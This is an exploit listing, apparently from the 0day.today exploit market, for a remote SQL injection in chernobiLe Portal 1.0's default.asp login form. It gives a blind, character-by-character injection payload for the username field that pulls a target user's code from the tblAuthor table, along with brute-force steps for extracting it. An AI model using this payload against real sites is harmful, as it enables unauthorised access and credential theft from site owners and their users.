[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability

Author
ajann
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1435
Category
web applications
Date add
27-01-2007
Platform
unsorted
======================================================================
chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
======================================================================



*******************************************************************************
# Title   :  chernobiLe Portal 1.0 (default.asp) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# $$      :  Not Free,Private


# Info    :  /*
            Turk Script Eklememen konusunda guzelce uyarmistim,ukalaca tamam demistin
            Fakat hala birsey bulmus gibi bazi sitelerde bu raporlarin basligini
            aciyorsun.Urastigin konuda bari acik birakma.Havani atmaya dvm et.
            *\

*******************************************************************************

[[SQL]]]

http://[target]/[path]//default.asp (POST Method) [SQL]

Example:

Method: One Char Brute Force Technique

First,Please Register Before:

User:[username]'/**/and/**/(substring((SELECT/**/user_code/**/FROM/**/tblAuthor/**/WHERE/**/username='targetuser'),1,1))='A'/*
Pass:[userpass]

If Login True Then First Character = A
elSe Continue...

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!


#  0day.today [2024-11-15]  #